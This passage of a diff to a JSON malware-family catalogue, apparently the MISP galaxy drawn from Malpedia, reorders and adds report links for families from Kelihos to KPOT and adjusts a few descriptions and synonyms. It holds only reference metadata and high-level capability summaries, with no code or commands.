"https://www.bleepingcomputer.com/news/security/us-convicts-russian-national-behind-kelihos-botnet-crypting-service/", - "https://www.crowdstrike.com/blog/inside-the-takedown-of-zombie-spider-and-the-kelihos-botnet/" + "https://www.crowdstrike.com/blog/farewell-to-kelihos-and-zombie-spider/", + "https://www.crowdstrike.com/blog/inside-the-takedown-of-zombie-spider-and-the-kelihos-botnet/", + "https://www.wired.com/2017/04/fbi-took-russias-spam-king-massive-botnet/", + "https://en.wikipedia.org/wiki/Kelihos_botnet", + "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/", + "https://www.bleepingcomputer.com/news/security/us-convicts-russian-national-behind-kelihos-botnet-crypting-service/" ], "synonyms": [], "type": [] @@ -29973,18 +31432,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kerrdown", - "https://go.recordedfuture.com/hubfs/reports/cta-2020-1110.pdf", "https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/", - "https://www.amnesty.de/sites/default/files/2021-02/Amnesty-Bericht-Vietnam-Click-And-Bait-Blogger-Deutschland-Spionage-Menschenrechtsverteidiger-Februar-2021.pdf", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://tradahacking.vn/th%C6%B0%E1%BB%9Fng-t%E1%BA%BFt-fbcbbed49da7", + "https://blog.cystack.net/word-based-malware-attack/", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.amnesty.de/sites/default/files/2021-02/Amnesty-Bericht-Vietnam-Click-And-Bait-Blogger-Deutschland-Spionage-Menschenrechtsverteidiger-Februar-2021.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/", - "https://norfolkinfosec.com/jeshell-an-oceanlotus-apt32-backdoor/", "https://www.secureworks.com/research/threat-profiles/tin-woodlawn", - "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam", - "https://blog.cystack.net/word-based-malware-attack/", - "https://tradahacking.vn/th%C6%B0%E1%BB%9Fng-t%E1%BA%BFt-fbcbbed49da7" + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-1110.pdf", + "https://norfolkinfosec.com/jeshell-an-oceanlotus-apt32-backdoor/", + "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam" ], "synonyms": [], "type": [] @@ -29997,10 +31456,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ketrican", + "https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/", "https://www.welivesecurity.com/2019/07/18/okrum-ke3chang-targets-diplomatic-missions/", - "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf", - "https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/" + "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/" ], "synonyms": [], "type": [] @@ -30027,11 +31486,11 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.keybase", "https://community.rsa.com/community/products/netwitness/blog/2018/02/15/malspam-delivers-keybase-keylogger-2-11-2017", - "https://th3l4b.blogspot.com/2015/10/keybase-loggerclipboardcredsstealer.html", - "https://isc.sans.edu/forums/diary/Malicious+Office+files+using+fileless+UAC+bypass+to+drop+KEYBASE+malware/22011/", - "https://www.virusbulletin.com/virusbulletin/2016/07/new-keylogger-block/", - "https://voidsec.com/keybase-en/", "https://unit42.paloaltonetworks.com/keybase-threat-grows-despite-public-takedown-a-picture-is-worth-a-thousand-words/", + "https://www.virusbulletin.com/virusbulletin/2016/07/new-keylogger-block/", + "https://isc.sans.edu/forums/diary/Malicious+Office+files+using+fileless+UAC+bypass+to+drop+KEYBASE+malware/22011/", + "https://voidsec.com/keybase-en/", + "https://th3l4b.blogspot.com/2015/10/keybase-loggerclipboardcredsstealer.html", "https://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/" ], "synonyms": [ @@ -30047,9 +31506,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.keyboy", - "https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/", "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html", "https://www.secureworks.com/research/threat-profiles/bronze-hobart", + "https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/", "https://citizenlab.ca/2016/11/parliament-keyboy/", "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/" ], @@ -30067,8 +31526,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.keylogger_apt3", "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", - "https://intrusiontruth.wordpress.com/2017/05/09/apt3-is-boyusec-a-chinese-intelligence-contractor/", - "https://twitter.com/smoothimpact/status/773631684038107136" + "https://cocomelonc.github.io/malware/2023/05/11/malware-tricks-28.html", + "https://twitter.com/smoothimpact/status/773631684038107136", + "https://intrusiontruth.wordpress.com/2017/05/09/apt3-is-boyusec-a-chinese-intelligence-contractor/" ], "synonyms": [], "type": [] @@ -30083,8 +31543,8 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.keymarble", "https://www.us-cert.gov/ncas/analysis-reports/AR18-221A", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", - "https://research.checkpoint.com/north-korea-turns-against-russian-targets/", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf" + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://research.checkpoint.com/north-korea-turns-against-russian-targets/" ], "synonyms": [], "type": [] @@ -30097,8 +31557,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kgh_spy", - "https://mp.weixin.qq.com/s/cbaePmZSk_Ob0r486RMXyw", - "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite" + "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite", + "https://mp.weixin.qq.com/s/cbaePmZSk_Ob0r486RMXyw" ], "synonyms": [], "type": [] @@ -30111,11 +31571,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.khonsari", - "https://cloudsek.com/technical-analysis-of-khonsari-ransomware-campaign-exploiting-the-log4shell-vulnerability/", + "https://assets.virustotal.com/reports/2021trends.pdf", "https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation", + "https://cloudsek.com/technical-analysis-of-khonsari-ransomware-campaign-exploiting-the-log4shell-vulnerability/", "https://www.cadosecurity.com/analysis-of-novel-khonsari-ransomware-deployed-by-the-log4shell-vulnerability/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks", - "https://assets.virustotal.com/reports/2021trends.pdf" + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks" ], "synonyms": [], "type": [] @@ -30124,14 +31584,14 @@ "value": "Khonsari" }, { - "description": "According to Unit42, KHRAT is a Trojan that registers victims using their infected machine’s username, system language and local IP address. KHRAT provides the threat actors typical RAT features and access to the victim system, including keylogging, screenshot capabilities, remote shell access and so on.", + "description": "According to Unit42, KHRAT is a Trojan that registers victims using their infected machine\u2019s username, system language and local IP address. KHRAT provides the threat actors typical RAT features and access to the victim system, including keylogging, screenshot capabilities, remote shell access and so on.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.khrat", "https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/", - "https://unit42.paloaltonetworks.com/atoms/rancortaurus/", + "https://www.forcepoint.com/de/blog/x-labs/trojanized-adobe-installer-used-install-dragonok-s-new-custom-backdoor", "https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/", - "https://www.forcepoint.com/de/blog/x-labs/trojanized-adobe-installer-used-install-dragonok-s-new-custom-backdoor" + "https://unit42.paloaltonetworks.com/atoms/rancortaurus/" ], "synonyms": [], "type": [] @@ -30157,28 +31617,32 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.killav", + "https://www.mandiant.com/resources/unc2596-cuba-ransomware", + "https://news.sophos.com/en-us/2022/12/13/signed-driver-malware-moves-up-the-software-trust-chain/", "https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/", "https://cyber.aon.com/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/" ], - "synonyms": [], + "synonyms": [ + "BURNTCIGAR" + ], "type": [] }, "uuid": "ad6ac685-e13f-4522-9805-644f82818347", "value": "KillAV" }, { - "description": "KillDisk is a generic detection name used by ESET to refer to destructive malware with disk wiping capabilities, such as damaging boot sectors and overwriting then deleting (system) files, followed by a reboot to render the machine unusable. Although all KillDisk malware has similar functionality, as a generic detection, individual samples do not necessarily have strong code similarities or relationships. Such generic malware detections usually have many “sub-families”, distinguished by the detection suffix (e.g. KillDisk.NBO, KillDisk.NCV, and KillDisk.NCX). Sub-family variants that do have strong code similarities, are sometimes seen in separate cyberattacks and thus can help researchers make connections between them. ", + "description": "KillDisk is a generic detection name used by ESET to refer to destructive malware with disk wiping capabilities, such as damaging boot sectors and overwriting then deleting (system) files, followed by a reboot to render the machine unusable. Although all KillDisk malware has similar functionality, as a generic detection, individual samples do not necessarily have strong code similarities or relationships. Such generic malware detections usually have many \u201csub-families\u201d, distinguished by the detection suffix (e.g. KillDisk.NBO, KillDisk.NCV, and KillDisk.NCX). Sub-family variants that do have strong code similarities, are sometimes seen in separate cyberattacks and thus can help researchers make connections between them. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.killdisk", - "https://www.secureworks.com/research/threat-profiles/iron-viking", + "https://attack.mitre.org/groups/G0034", "https://www.welivesecurity.com/2017/01/05/killdisk-now-targeting-linux-demands-250k-ransom-cant-decrypt", - "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/", - "https://www.youtube.com/watch?v=mrTdSdMMgnk", - "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks", "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", - "https://attack.mitre.org/groups/G0034" + "https://www.youtube.com/watch?v=mrTdSdMMgnk", + "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/", + "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", + "https://www.secureworks.com/research/threat-profiles/iron-viking" ], "synonyms": [], "type": [] @@ -30218,21 +31682,22 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kimsuky", "https://metaswan.github.io/posts/Malware-Kimsuky-group's-resume-impersonation-malware", - "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html", - "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-kimsuky-group-tracking-king-spearphishing/", - "https://www.boho.or.kr/filedownload.do?attach_file_seq=2652&attach_file_id=EpF2652.pdf", - "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html", + "https://asec.ahnlab.com/en/53046/", + "https://medium.com/walmartglobaltech/pivoting-on-a-sharpext-to-profile-kimusky-panels-for-great-good-1920dc1bcef9", + "https://cocomelonc.github.io/malware/2022/08/26/malware-pers-9.html", + "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure", "https://vblocalhost.com/presentations/operation-newton-hi-kimsuky-did-an-appleseed-really-fall-on-newtons-head/", "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-Kim.pdf", - "https://blog.prevailion.com/2019/09/autumn-aperture-report.html", "https://asec.ahnlab.com/en/37396/", - "https://blog.alyac.co.kr/2347", "https://asec.ahnlab.com/en/30532/", - "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", - "https://medium.com/walmartglobaltech/pivoting-on-a-sharpext-to-profile-kimusky-panels-for-great-good-1920dc1bcef9", - "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure", + "https://blog.prevailion.com/2019/09/autumn-aperture-report.html", "https://inquest.net/blog/2021/08/23/kimsuky-espionage-campaign", - "https://cocomelonc.github.io/malware/2022/08/26/malware-pers-9.html" + "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html", + "https://www.boho.or.kr/filedownload.do?attach_file_seq=2652&attach_file_id=EpF2652.pdf", + "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://blog.alyac.co.kr/2347", + "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-kimsuky-group-tracking-king-spearphishing/" ], "synonyms": [], "type": [] @@ -30245,12 +31710,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kingminer", - "https://www.bitdefender.com/files/News/CaseStudies/study/354/Bitdefender-PR-Whitepaper-KingMiner-creat4610-en-EN-GenericUse.pdf", - "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-labs-kingminer-botnet-report.pdf", - "https://www.bleepingcomputer.com/news/security/vulnerable-microsoft-sql-servers-targeted-with-cobalt-strike/", - "https://www.trendmicro.com/en_us/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html", + "https://asec.ahnlab.com/en/32572/", "https://news.sophos.com/en-us/2020/06/09/kingminer-report/", - "https://asec.ahnlab.com/en/32572/" + "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-labs-kingminer-botnet-report.pdf", + "https://www.trendmicro.com/en_us/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html", + "https://www.bleepingcomputer.com/news/security/vulnerable-microsoft-sql-servers-targeted-with-cobalt-strike/", + "https://www.bitdefender.com/files/News/CaseStudies/study/354/Bitdefender-PR-Whitepaper-KingMiner-creat4610-en-EN-GenericUse.pdf" ], "synonyms": [], "type": [] @@ -30264,9 +31729,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kins", "https://www.vkremez.com/2018/10/lets-learn-exploring-zeusvm-banking.html", + "https://securityintelligence.com/zeus-maple-variant-targets-canadian-online-banking-customers/", "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/", - "https://github.com/nyx0/KINS", - "https://securityintelligence.com/zeus-maple-variant-targets-canadian-online-banking-customers/" + "https://github.com/nyx0/KINS" ], "synonyms": [ "Kasper Internet Non-Security", @@ -30282,9 +31747,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kivars", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt", "https://www.trendmicro.com/en_us/research/17/f/following-trail-blacktech-cyber-espionage-campaigns.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt" + "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/" ], "synonyms": [], "type": [] @@ -30309,6 +31774,7 @@ "description": "KleptoParasite Stealer is advertised on Hackforums as a noob-friendly stealer. It is modular and comes with a IP retriever module, a Outlook stealer (32bit/64bit) and a Chrome/Firefox stealer (32bit/64bit). Earlier versions come bundled (loader plus modules), newer versions come with a loader (167k) that grabs the modules.\r\n\r\nPDB-strings suggest a relationship to JogLog v6 and v7.", "meta": { "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer", "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer" ], "synonyms": [ @@ -30338,8 +31804,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.klrd", - "https://securitykitten.github.io/2016/11/28/the-klrd-keylogger.html", - "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks" + "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + "https://securitykitten.github.io/2016/11/28/the-klrd-keylogger.html" ], "synonyms": [], "type": [] @@ -30365,18 +31831,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.koadic", - "https://github.com/zerosum0x0/koadic", - "http://www.secureworks.com/research/threat-profiles/cobalt-ulster", - "https://www.secureworks.com/research/threat-profiles/gold-drake", - "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", "https://resources.malwarebytes.com/files/2021/02/LazyScripter.pdf", - "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", "https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf", + "https://blog.tofile.dev/2020/11/28/koadic_jarm.html", "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", - "https://www.secureworks.com/research/threat-profiles/cobalt-ulster", - "http://www.secureworks.com/research/threat-profiles/gold-drake", + "http://www.secureworks.com/research/threat-profiles/cobalt-ulster", + "https://github.com/zerosum0x0/koadic", "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf", - "https://blog.tofile.dev/2020/11/28/koadic_jarm.html" + "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", + "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", + "http://www.secureworks.com/research/threat-profiles/gold-drake", + "https://www.secureworks.com/research/threat-profiles/cobalt-ulster", + "https://www.secureworks.com/research/threat-profiles/gold-drake" ], "synonyms": [], "type": [] @@ -30415,10 +31881,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.komprogo", + "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf", "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", - "https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx", "https://www.symantec.com/security_response/earthlink_writeup.jsp?docid=2015-120808-5327-99", - "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf" + "https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx" ], "synonyms": [ "Splinter RAT" @@ -30433,25 +31899,25 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.konni", - "https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/", - "https://blog.alyac.co.kr/2474", - "https://www.bleepingcomputer.com/news/security/hackers-take-over-diplomats-email-target-russian-deputy-minister/", - "https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html", - "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html", + "https://cocomelonc.github.io/malware/2022/09/06/malware-tricks-23.html", + "https://blog.malwarebytes.com/threat-intelligence/2022/01/konni-evolves-into-stealthier-rat/", + "http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html", + "https://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/", "https://vallejo.cc/2017/07/08/analysis-of-new-variant-of-konni-rat/", "https://www.bleepingcomputer.com/news/security/north-korean-hackers-attack-eu-targets-with-konni-rat-malware/", "https://cluster25.io/wp-content/uploads/2022/01/Konni_targeting_Russian_diplomatic_sector.pdf", + "https://blog.alyac.co.kr/2474", "https://blog.lumen.com/new-konni-campaign-targeting-russian-ministry-of-foreign-affairs/", - "https://blog.malwarebytes.com/threat-intelligence/2022/01/konni-evolves-into-stealthier-rat/", - "https://us-cert.cisa.gov/ncas/alerts/aa20-227a", - "http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html", - "https://blog.fortinet.com/2017/08/15/a-quick-look-at-a-new-konni-rat-variant", - "https://e.cyberint.com/hubfs/Cyberint_Konni%20Malware%202019%20Campaign_Report.pdf", - "http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html", + "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b", "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/", - "https://cocomelonc.github.io/malware/2022/09/06/malware-tricks-23.html", - "https://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/", - "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b" + "https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/", + "https://e.cyberint.com/hubfs/Cyberint_Konni%20Malware%202019%20Campaign_Report.pdf", + "https://blog.fortinet.com/2017/08/15/a-quick-look-at-a-new-konni-rat-variant", + "http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html", + "https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html", + "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html", + "https://us-cert.cisa.gov/ncas/alerts/aa20-227a", + "https://www.bleepingcomputer.com/news/security/hackers-take-over-diplomats-email-target-russian-deputy-minister/" ], "synonyms": [], "type": [] @@ -30477,26 +31943,27 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.korlia", - "https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/", - "https://www.sentinelone.com/labs/targets-of-interest-russian-organizations-increasingly-under-attack-by-chinese-apts/", - "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", - "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf", + "https://www.youtube.com/watch?v=_fstHQSK-kk", + "https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment", "https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html", - "https://www.secureworks.com/research/threat-profiles/bronze-huntley", + "https://www.sentinelone.com/labs/targets-of-interest-russian-organizations-increasingly-under-attack-by-chinese-apts/", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_3_takai_jp.pdf", + "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2014-11-25-curious-korlia.md", + "https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/", + "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/", + "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf", + "https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf", "https://web.archive.org/web/20130920120931/https:/www.rsaconference.com/writable/presentations/file_upload/cle-t04_final_v1.pdf", "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/", - "https://securitykitten.github.io/2014/11/25/curious-korlia.html", "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.93_ENG.pdf", - "http://asec.ahnlab.com/tag/Operation%20Bitter%20Biscuit", - "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2014-11-25-curious-korlia.md", - "https://www.youtube.com/watch?v=_fstHQSK-kk", "https://asec.ahnlab.com/1298", "https://unit42.paloaltonetworks.com/unit42-bisonal-malware-used-attacks-russia-south-korea/", - "https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf", - "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf", - "https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment", - "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_3_takai_jp.pdf", - "https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/" + "https://www.secureworks.com/research/threat-profiles/bronze-huntley", + "https://securitykitten.github.io/2014/11/25/curious-korlia.html", + "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", + "https://go.recordedfuture.com/hubfs/reports/cta-2023-0919.pdf", + "http://asec.ahnlab.com/tag/Operation%20Bitter%20Biscuit" ], "synonyms": [ "Bisonal" @@ -30511,17 +31978,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kovter", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/kovter-an-evolving-malware-gone-fileless", "https://blog.malwarebytes.com/threat-analysis/2016/07/untangling-kovter/", - "https://0x00sec.org/t/analyzing-modern-malware-techniques-part-1/18663", - "https://blog.malwarebytes.com/threat-analysis/2015/01/major-malvertising-campaign-hits-sites-with-combined-total-monthly-traffic-of-1-5bn-visitors/", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/Kovter/Kovter.md", - "https://www.symantec.com/connect/blogs/kovter-malware-learns-poweliks-persistent-fileless-registry-update", - "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", - "https://0xchrollo.github.io/articles/unpacking-kovter-malware/", "https://github.com/ewhitehats/kovterTools/blob/master/KovterWhitepaper.pdf", - "https://us-cert.cisa.gov/ncas/alerts/aa20-345a" + "https://www.cybereason.com/blog/how-click-fraud-commodity-malware-transforms-into-an-advanced-threat", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/kovter-an-evolving-malware-gone-fileless", + "https://blog.malwarebytes.com/threat-analysis/2015/01/major-malvertising-campaign-hits-sites-with-combined-total-monthly-traffic-of-1-5bn-visitors/", + "https://0x00sec.org/t/analyzing-modern-malware-techniques-part-1/18663", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", + "https://www.symantec.com/connect/blogs/kovter-malware-learns-poweliks-persistent-fileless-registry-update", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://0xchrollo.github.io/articles/unpacking-kovter-malware/" ], "synonyms": [], "type": [] @@ -30530,23 +31998,23 @@ "value": "Kovter" }, { - "description": "", + "description": "KPOT is an information-stealing Trojan horse that can steal information from infected computers. It is distributed through phishing emails and malicious websites. Once executed on a computer, KPOT can steal passwords, credit card numbers, and other personal information.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kpot_stealer", - "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", - "https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/kpot2/KPOT.md", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", - "https://medium.com/s2wlab/deep-analysis-of-kpot-stealer-fb1d2be9c5dd", "https://isc.sans.edu/diary/26010", - "https://www.flashpoint-intel.com/blog/malware-campaign-targets-jaxx-cryptocurrency-wallet-users/", - "https://www.zdnet.com/article/revil-ransomware-gang-acquires-kpot-malware/", - "https://isc.sans.edu/diary/25934", - "https://www.proofpoint.com/us/threat-insight/post/new-kpot-v20-stealer-brings-zero-persistence-and-memory-features-silently-steal", "https://blog.ensilo.com/game-of-trojans-dissecting-khalesi-infostealer-malware", "https://blag.nullteilerfrei.de/2020/04/26/use-ghidra-to-decrypt-strings-of-kpotstealer-malware/", + "https://www.zdnet.com/article/revil-ransomware-gang-acquires-kpot-malware/", + "https://isc.sans.edu/diary/25934", + "https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/kpot2/KPOT.md", + "https://news.drweb.com/show/?i=13242&lng=en", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", - "https://news.drweb.com/show/?i=13242&lng=en" + "https://medium.com/s2wlab/deep-analysis-of-kpot-stealer-fb1d2be9c5dd", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", + "https://www.proofpoint.com/us/threat-insight/post/new-kpot-v20-stealer-brings-zero-persistence-and-memory-features-silently-steal", + "https://www.flashpoint-intel.com/blog/malware-campaign-targets-jaxx-cryptocurrency-wallet-users/", + "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors" ], "synonyms": 